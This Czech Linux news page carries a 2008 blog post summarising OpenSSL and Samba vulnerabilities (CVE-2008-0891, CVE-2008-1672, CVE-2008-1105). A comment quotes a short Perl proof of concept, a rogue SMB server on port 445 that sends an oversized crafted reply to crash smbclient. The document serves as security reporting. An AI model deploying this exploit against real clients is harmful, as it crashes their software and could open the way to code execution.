abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
itbiz logo Píšeme jinde
napište » Zprávičky
Nové projekty konsorcia Linux Foundation
včera 19:55 | Komunita

Neziskové technologické konsorcium Linux Foundation minulý týden rozšířilo seznam svých projektů. Novinkou je CHIPS Alliance a Continuous Delivery Foundation (CDF). Spojením Node.js Foundation a JS Foundation vznikla OpenJS Foundation. Představena byla také platforma CommunityBridge nebo Red Team Project.

Ladislav Hagara | Komentářů: 0
OpenXR a Monado
včera 18:11 | IT novinky

Neziskové průmyslové konsorcium Khronos Group vydalo verzi 0.90 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Společnost Collabora současně představila open source implementaci OpenXR s názvem Monado. Videoukázka na YouTube.

Ladislav Hagara | Komentářů: 0
Geary 3.32
včera 13:55 | Nová verze

Byla vydána verze 3.32 poštovního klienta Geary (Wikipedie). Změněno bylo číslování verzí. Předchozí verze byla 0.13. Nově bude číslování verzí stejné jako u GNOME.

Ladislav Hagara | Komentářů: 2
Solus 4 Fortitude
včera 01:33 | Nová verze

Byla vydána nová major verze 4 průběžně aktualizované (rolling release) linuxové distribuce Solus (Wikipedie). Přehled novinek i s náhledy v příspěvku na blogu. Solus 4 je ke stažení v edicích Budgie, GNOME a MATE. Solus používá správce balíčku eopkg. Dotazy a odpovědi v novém diskusním fóru.

Ladislav Hagara | Komentářů: 0
vrnetlab, open source síťový emulátor
17.3. 22:11 | Zajímavý software

Brian Linkletter se na svém blogu věnuje open source síťovým simulátorům. V nejnovějším příspěvku představuje open source síťový emulátor vrnetlab (VR Network Lab). Ten k běhu jednotlivých routerů používá Docker.

Ladislav Hagara | Komentářů: 0
Nový videoklip od SUSE
17.3. 02:22 | Humor

Společnost SUSE natočila a na YouTube zveřejnila nový videoklip: Walk Like A Chameleon - SUSE Music Parody.

Ladislav Hagara | Komentářů: 19
PuTTY 0.71
17.3. 00:11 | Nová verze

Byla vydána verze 0.71 populárního telnet a ssh klienta PuTTY. Podrobnosti v přehledu změn. Řešeno je také několik bezpečnostních chyb. Nalezení většiny z nich bylo sponzorováno Evropskou komisí.

Ladislav Hagara | Komentářů: 0
OpenRA 20190314
15.3. 22:44 | Nová verze

V rámci projektu OpenRA je vyvíjen svobodný engine pro starší strategické hry Command & Conquer (nyní jsou freeware) a Dune 2000. Vydání 20190314 pokrývá změny za posledního půl roku: vylepšené chování jednotek, přepis kódu pro AI a celkem 9 nových misí pro jednoho hráče.

Fluttershy, yay! | Komentářů: 2
NetworkManager 1.16.0
15.3. 21:33 | Nová verze

Po půl roce vývoje od vydání verze 1.14.0 byla vydána nová verze 1.16.0 sady nástrojů pro správu síťových připojení NetworkManager. Novinkám se na svých blozích věnují Ľubomír Rintel a Thomas Haller. Zdůrazněna je podpora WireGuardu.

Ladislav Hagara | Komentářů: 0
Sublime Text 3.2 a Sublime Merge
15.3. 14:55 | Nová verze

Po deseti měsících vývoje od vydání verze 3.1 byla vydána nová stabilní verze 3.2 proprietárního multiplatformního editoru textových souborů a zdrojových kódů Sublime Text (Wikipedie). Přehled novinek v příspěvku na blogu. Sublime Text je ke stažení a k vyzkoušení zdarma. Pro další používání je nutná licence v ceně 80 dolarů. Vývojáři editoru Sublime Text nedávno představili svého git klienta Sublime Merge. Ten je také ke stažení a k vyzkoušení zdarma. Licence stojí 99 dolarů.

Ladislav Hagara | Komentářů: 0
Centrum | Napsat | Starší
navrhněte » Anketa
Kolik balíčků (v tisících) máte nainstalovaných na svém systému?
 (3%)
 (12%)
 (35%)
 (30%)
 (19%)
 (3%)
 (2%)
 (1%)
 (3%)
Celkem 202 hlasů
 Komentářů: 16, poslední 14.3. 20:04
Rozcestník
AbcLinuxu
HDmag.cz
Ladislav Hagara - Ride the Raven
Ride the Raven to gaze the sorcery world, where you can summon, cast and dispel spells and scribe grimoires in your codex.
Aktuální zápisy
?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív
?Seznam mých oblíbených stránek, které pravidelně navštěvuji. Oblíbené stránky
?Poslední screenshot mého desktopu. Současný desktop
AbcLinuxu a YouTube v Browsh
?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
Nej blogů na AbcLinuxu
Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
AbcLinuxu:/ Blogy / Ride the Raven / GNU/Linux / OpenSSL a Samba / bezpečnostní problémy
Štítky: aktualizace, bug, C, programování, Samba, server

OpenSSL a Samba / bezpečnostní problémy

28.5.2008 18:35 | Přečteno: 1829× | GNU/Linux | poslední úprava: 29.5.2008 17:57


Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

K dispozici je už také nová verze Samby 3.0.30.

       

Hodnocení: 100 %

        špatnédobré        

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

Vložit další komentář

2.6.2008 12:46 Ladislav Hagara | skóre: 87 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy
Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}
Píšeme jinde
ISSN 1214-1267   www.czech-server.cz
Redakce | Inzerce | Podmínky použití | Osobní údaje
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.